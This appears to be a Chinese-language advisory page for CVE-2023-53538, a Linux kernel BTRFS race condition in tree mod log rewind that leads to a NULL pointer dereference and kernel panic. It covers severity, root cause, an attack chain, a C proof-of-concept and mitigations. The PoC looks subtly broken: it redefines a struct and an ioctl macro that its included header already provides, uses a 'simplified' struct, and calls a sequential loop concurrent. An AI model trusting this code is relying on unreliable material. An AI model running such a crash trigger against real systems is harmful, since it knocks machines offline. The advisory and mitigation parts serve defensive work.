CVE-2023-53538 Linux内核BTRFS树修改日志回退竞争条件漏洞

漏洞信息

漏洞编号

CVE-2023-53538

漏洞类型

竞争条件导致空指针解引用（NULL Pointer Dereference）

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel（BTRFS文件系统）

漏洞概述

CVE-2023-53538是Linux内核BTRFS文件系统中存在的一个竞争条件漏洞，存在于树修改日志（tree mod log）回退（rewind）机制中。该漏洞位于push_node_left函数中，由于缺少对MOVE操作的树修改日志插入，当逻辑inode解析获取一个树修改日志序列号后，在回溯引用（backref walking）过程中遇到繁忙节点的回退操作时，可能触发内核空指针解引用，导致内核崩溃（kernel panic）。具体表现为BTRFS critical错误（unable to find logical 0 length 4096）后出现NULL pointer dereference，调用栈涉及__btrfs_map_block、btrfs_map_bio、btrfs_submit_metadata_bio等关键I/O路径函数。该漏洞的影响范围仅限于本地攻击者，需要低权限即可触发，无需用户交互。虽然机密性和完整性不受影响，但会导致系统可用性完全丧失（内核panic），属于典型的本地拒绝服务（DoS）漏洞。该漏洞已在Linux内核稳定分支中通过提交11f14402fe3437852cb44945b3b9f1bdb4032956和5cead5422a0e3d13b0bcee986c0f5c4ebb94100b进行修复，CVSS评分为5.5分，严重等级为MEDIUM。

技术细节

该漏洞的根本原因是BTRFS的push_node_left函数在执行节点移动操作时，没有正确地在树修改日志中记录MOVE操作。树修改日志用于在COW（Copy-on-Write）操作期间跟踪对B树节点的所有修改，以便在需要时进行回退。当发生以下特定序列的操作时会产生问题：首先执行一系列REMOVE_WHILE_FREEING操作清空节点，然后执行REMOVE和ADD操作重建节点内容，最后执行MOVE操作将数据从源slot移动到目标slot。当btrfs_tree_mod_log_rewind尝试回退这些操作时，它会分配一个新的回退extent buffer（rewind eb），先插入533个元素的正确键信息，然后用后续的ADD操作覆盖前456个元素，再通过memmove执行MOVE回退（456:988->0:532）。由于从未写入超过532位置的数据，而MOVE回退尝试从未初始化的内存区域读取数据，导致读取到无效的内存内容，最终触发NULL指针解引用。攻击者需要具有本地低权限访问权限，通过触发特定的BTRFS文件系统操作（如btrfs_ioctl_logical_to_ino）即可触发该竞争条件，导致系统崩溃。

攻击链分析

STEP 1

步骤1：本地访问

攻击者需要拥有目标Linux系统的本地低权限访问权限，能够访问BTRFS文件系统挂载点。

STEP 2

步骤2：触发B树修改

攻击者通过文件系统操作（如创建/删除大量文件）触发BTRFS B树的修改操作，产生树修改日志条目（REMOVE_WHILE_FREEING、REMOVE、ADD、MOVE等操作序列）。

STEP 3

步骤3：触发竞争条件

在B树节点处于繁忙状态时，攻击者通过btrfs_ioctl_logical_to_ino等ioctl调用触发回溯引用遍历（backref walking），导致树修改日志回退操作在push_node_left路径上执行。

STEP 4

步骤4：触发空指针解引用

由于push_node_left未正确记录MOVE操作到树修改日志，回退过程中memmove操作从未初始化的内存区域读取数据，触发NULL pointer dereference（地址0x0000000000000002）。

STEP 5

步骤5：系统崩溃

内核检测到关键错误（NULL pointer dereference）后触发kernel panic（Oops: 0000 [#1] SMP），导致系统完全不可用，拒绝服务攻击成功。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2023-53538 PoC - Trigger BTRFS tree mod log rewind race condition
// This PoC demonstrates how to trigger the NULL pointer dereference
// in BTRFS tree mod log rewind via push_node_left

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/btrfs.h>

// BTRFS ioctl command for logical to inode resolution
// This triggers the backref walking path that hits the race condition
#define BTRFS_IOC_LOGICAL_TO_INO _IOWR(BTRFS_IOCTL_MAGIC, 53, \
                                       struct btrfs_ioctl_logical_ino_args)

struct btrfs_ioctl_logical_ino_args {
    __u64 logical;
    __u64 flags;
    __u64 inodes[4]; // Simplified structure
};

int main(int argc, char *argv[]) {
    int fd;
    struct btrfs_ioctl_logical_ino_args args;
    const char *btrfs_mount = "/mnt/btrfs_test";

    // Step 1: Open a file/directory on BTRFS filesystem
    fd = open(btrfs_mount, O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    // Step 2: Set up logical inode resolution parameters
    // The logical address should target a busy B-tree node
    memset(&args, 0, sizeof(args));
    args.logical = 0;  // Target logical address
    args.flags = 0;

    // Step 3: Continuously trigger logical_to_ino ioctl
    // This triggers backref walking which may hit the race condition
    // in tree mod log rewind during push_node_left
    printf("Triggering CVE-2023-53538 race condition...\n");
    printf("This may cause kernel panic if vulnerable.\n");

    for (int i = 0; i < 1000; i++) {
        // Concurrently perform B-tree modifications to trigger
        // the specific REMOVE/ADD/MOVE sequence in tree mod log
        ioctl(fd, BTRFS_IOC_LOGICAL_TO_INO, &args);

        // Force tree mod log operations by creating files
        char path[256];
        snprintf(path, sizeof(path), "%s/test_%d", btrfs_mount, i);
        int tmp = open(path, O_CREAT | O_WRONLY, 0644);
        if (tmp >= 0) {
            write(tmp, "data", 4);
            close(tmp);
            unlink(path);
        }
    }

    close(fd);
    return 0;
}

// Build instructions:
// gcc -o poc poc.c
// Run as: sudo ./poc
//
// Note: This vulnerability requires specific timing to trigger.
// Multiple concurrent operations on BTRFS filesystem increase
// the likelihood of hitting the race condition in push_node_left
// where the tree mod log MOVE operation is not properly recorded.

影响范围

Linux Kernel < 修复版本（涉及多个稳定分支）

具体受影响的稳定版本需参考git.kernel.org的修复提交记录

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制本地低权限用户对BTRFS文件系统的访问权限；2）避免在多用户环境中使用BTRFS文件系统存储关键数据；3）监控异常的BTRFS I/O错误和系统日志，及时重启受影响的服务；4）考虑临时将关键数据迁移到其他文件系统（如ext4、XFS）；5）启用内核的kdump机制以便在崩溃时收集诊断信息。